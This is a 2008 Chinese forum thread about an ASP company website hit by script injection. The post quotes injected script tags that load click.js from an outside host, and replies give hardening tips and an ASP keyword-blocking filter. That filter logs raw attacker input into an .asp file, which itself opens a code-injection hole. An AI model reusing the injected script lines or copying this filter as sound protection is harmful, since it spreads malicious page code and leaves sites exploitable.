28,390
社区成员
发帖
与我相关
我的任务
分享一个黑客攻击我们的企业站,称所有asp开发的语言都差!居然那么不狂
放的网码!!
<script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script><script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script>
<script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script>
<script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script><script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script>
<script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script>
...全文
请发表友善的回复…
发表回复
haiyun365 2008-06-05
- 打赏
- 举报
3.文件只读,权限设置
mrshelly 2008-06-04
- 打赏
- 举报
该交的学费,还是要缴的.....
不是随便写点代码,就可以做WEB开发了....
WEB 安全,,多关注些吧....
不是随便写点代码,就可以做WEB开发了....
WEB 安全,,多关注些吧....
forplay 2008-06-04
- 打赏
- 举报
[Quote=引用 8 楼 Jack_Senlan 的回复:]
哎,ASP不是大家想的那样,现在傻了吧
[/Quote]
ASP很差吗?
哎,ASP不是大家想的那样,现在傻了吧
[/Quote]
ASP很差吗?
Jack_Senlan 2008-06-04
- 打赏
- 举报
哎,ASP不是大家想的那样,现在傻了吧
Atai-Lu 2008-06-04
- 打赏
- 举报
我是来接分的
yifanwu 2008-06-04
- 打赏
- 举报
很多人没有办法解决,可是有办法有时间有精力有能力B4
yyusnO 2008-06-04
- 打赏
- 举报
强烈鄙视放马的~
做一下安全检查吧~
做一下安全检查吧~
yongyong184 2008-06-04
- 打赏
- 举报
网站中是不是用了编辑器了``
编辑器中是有很多致命的漏洞的``
编辑器中是有很多致命的漏洞的``
yunbao 2008-06-04
- 打赏
- 举报
script language="javascript"
这是js代码 我帮你顶一个
这是js代码 我帮你顶一个
weihanmingwhmwhm 2008-06-04
- 打赏
- 举报
如何注入,有时我后台都删了,才免一会,噢,好气人!
chinastorm 2008-06-04
- 打赏
- 举报
利用SQL注入实现的?
weihanmingwhmwhm 2008-06-04
- 打赏
- 举报
[Quote=引用 23 楼 chang1216 的回复:]
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
''自定义需要过滤的字串,用 "防" 分隔
'Fy_In = "''防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防 <防>防=防 ¦防-防_"
Fy_In = """防'防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防 <防>防=防 ¦防_防 <iframe>防 </iframe>"…
[/Quote]
这个能解决吗?
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
''自定义需要过滤的字串,用 "防" 分隔
'Fy_In = "''防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防 <防>防=防 ¦防-防_"
Fy_In = """防'防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防 <防>防=防 ¦防_防 <iframe>防 </iframe>"…
[/Quote]
这个能解决吗?
xri13 2008-06-04
- 打赏
- 举报
那是木马 你在conn里面写防止注入sql的就行了
文件只读,权限设置
在写23楼的代码就差不多了
文件只读,权限设置
在写23楼的代码就差不多了
jack09596 2008-06-04
- 打赏
- 举报
关注一下
极品懒人 2008-06-04
- 打赏
- 举报
过滤不足
weihanmingwhmwhm 2008-06-04
- 打赏
- 举报
[Quote=引用 3 楼 yunbao 的回复:]
script language="javascript"
这是js代码 我帮你顶一个
[/Quote]
有编辑器的
script language="javascript"
这是js代码 我帮你顶一个
[/Quote]
有编辑器的
tantaiyizu 2008-06-04
- 打赏
- 举报
呵呵
chang1216 2008-06-04
- 打赏
- 举报
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
''自定义需要过滤的字串,用 "防" 分隔
'Fy_In = "''防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防-防_"
Fy_In = """防'防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防_防<iframe>防</iframe>"
Fy_Inf = split(Fy_In,"防")
'For Fy_Xh=0 To Ubound(Fy_Inf)
' response.write Fy_Inf(Fy_Xh) & "<br>"
'next
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "对不起!!您试图输入恶意代码!!我们将对您的ip进行相应的处理!"
Response.Write "本站已经给您做了如下记录↓<br>"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
if Request.ServerVariables("HTTP_X_FORWARDED_FOR")=null or Request.ServerVariables("HTTP_X_FORWARDED_FOR")="" then
Response.Write "内网IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
else
Response.Write "内网 IP:" &Request.ServerVariables("HTTP_X_FORWARDED_FOR") &"<br>"
end if
Response.Write "操作时间:"&Now&"<br>"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式:POST<br>"
Response.Write "提交参数:"&Fy_Post&"<br>"
Response.Write "提交数据:"&Request.Form(Fy_Post)
txtRecord Request.ServerVariables("REMOTE_ADDR"),Request.ServerVariables("HTTP_X_FORWARDED_FOR"),now,Request.ServerVariables("URL"),"POST",Fy_Post,Request.QueryString(Fy_Post)
Response.End
End If
Next
Next
End If
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "对不起!!您试图输入恶意代码!!我们将对您的ip进行相应的处理!<br>"
Response.Write "非法操作!本站已经给您做了如下记录↓<br>"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
if Request.ServerVariables("HTTP_X_FORWARDED_FOR")=null or Request.ServerVariables("HTTP_X_FORWARDED_FOR")="" then
Response.Write "内网IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
else
Response.Write "内网 IP:" &Request.ServerVariables("HTTP_X_FORWARDED_FOR") &"<br>"
end if
Response.Write "操作时间:"&Now&"<br>"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式:GET<br>"
Response.Write "提交参数:"&Fy_Get&"<br>"
Response.Write "提交数据:"&Request.QueryString(Fy_Get)
txtRecord Request.ServerVariables("REMOTE_ADDR"),Request.ServerVariables("HTTP_X_FORWARDED_FOR"),now,Request.ServerVariables("URL"),"GET",Fy_Get,Request.QueryString(Fy_Get)
Response.End
End If
Next
Next
End If
function txtRecord(daliIP,neibuIP,lczNow,lczPage,lczPostOrGet,lczCanshu,lczData)
if neibuIP="" or neibuIP=null then
neibuIP=daliIP
end if
dim fso,stream
path=server.MapPath("txtrecord.asp")
set fso=server.CreateObject("Scripting.filesystemobject")
if not fso.fileexists(path) then
set stream=fso.createtextfile(path,true)
stream.writeline("操作IP 操作IP1 操作时间 操作页面 提交方式 提交参数 提交数据")
set stream=nothing
end if
Set filelcz = fso.GetFile(path)
Set ts = filelcz.OpenAsTextStream(8, -2)
ts.writeline daliIP&" "&neibuIP&" "&lczNow&" "&lczPage&" "&lczPostOrGet&" "&lczCanshu&" "&lczData
ts.close
set ts=nothing
set filelcz=nothing
set fos=nothing
end function
''自定义需要过滤的字串,用 "防" 分隔
'Fy_In = "''防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防-防_"
Fy_In = """防'防;防cmd防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防_防<iframe>防</iframe>"
Fy_Inf = split(Fy_In,"防")
'For Fy_Xh=0 To Ubound(Fy_Inf)
' response.write Fy_Inf(Fy_Xh) & "<br>"
'next
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "对不起!!您试图输入恶意代码!!我们将对您的ip进行相应的处理!"
Response.Write "本站已经给您做了如下记录↓<br>"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
if Request.ServerVariables("HTTP_X_FORWARDED_FOR")=null or Request.ServerVariables("HTTP_X_FORWARDED_FOR")="" then
Response.Write "内网IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
else
Response.Write "内网 IP:" &Request.ServerVariables("HTTP_X_FORWARDED_FOR") &"<br>"
end if
Response.Write "操作时间:"&Now&"<br>"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式:POST<br>"
Response.Write "提交参数:"&Fy_Post&"<br>"
Response.Write "提交数据:"&Request.Form(Fy_Post)
txtRecord Request.ServerVariables("REMOTE_ADDR"),Request.ServerVariables("HTTP_X_FORWARDED_FOR"),now,Request.ServerVariables("URL"),"POST",Fy_Post,Request.QueryString(Fy_Post)
Response.End
End If
Next
Next
End If
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "对不起!!您试图输入恶意代码!!我们将对您的ip进行相应的处理!<br>"
Response.Write "非法操作!本站已经给您做了如下记录↓<br>"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
if Request.ServerVariables("HTTP_X_FORWARDED_FOR")=null or Request.ServerVariables("HTTP_X_FORWARDED_FOR")="" then
Response.Write "内网IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
else
Response.Write "内网 IP:" &Request.ServerVariables("HTTP_X_FORWARDED_FOR") &"<br>"
end if
Response.Write "操作时间:"&Now&"<br>"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.Write "提交方式:GET<br>"
Response.Write "提交参数:"&Fy_Get&"<br>"
Response.Write "提交数据:"&Request.QueryString(Fy_Get)
txtRecord Request.ServerVariables("REMOTE_ADDR"),Request.ServerVariables("HTTP_X_FORWARDED_FOR"),now,Request.ServerVariables("URL"),"GET",Fy_Get,Request.QueryString(Fy_Get)
Response.End
End If
Next
Next
End If
function txtRecord(daliIP,neibuIP,lczNow,lczPage,lczPostOrGet,lczCanshu,lczData)
if neibuIP="" or neibuIP=null then
neibuIP=daliIP
end if
dim fso,stream
path=server.MapPath("txtrecord.asp")
set fso=server.CreateObject("Scripting.filesystemobject")
if not fso.fileexists(path) then
set stream=fso.createtextfile(path,true)
stream.writeline("操作IP 操作IP1 操作时间 操作页面 提交方式 提交参数 提交数据")
set stream=nothing
end if
Set filelcz = fso.GetFile(path)
Set ts = filelcz.OpenAsTextStream(8, -2)
ts.writeline daliIP&" "&neibuIP&" "&lczNow&" "&lczPage&" "&lczPostOrGet&" "&lczCanshu&" "&lczData
ts.close
set ts=nothing
set filelcz=nothing
set fos=nothing
end function
iamXiaMi 2008-06-04
- 打赏
- 举报
你自己机器中毒了..~~~
lijie9693 2008-06-04
- 打赏
- 举报
[Quote=引用 16 楼 Edwingu 的回复:]
asp不差
1.防注入
2.防FTP传马
3.文件只读,权限设置
4.JF ^_^
[/Quote]
asp不差
1.防注入
2.防FTP传马
3.文件只读,权限设置
4.JF ^_^
[/Quote]
加载更多回复(9)
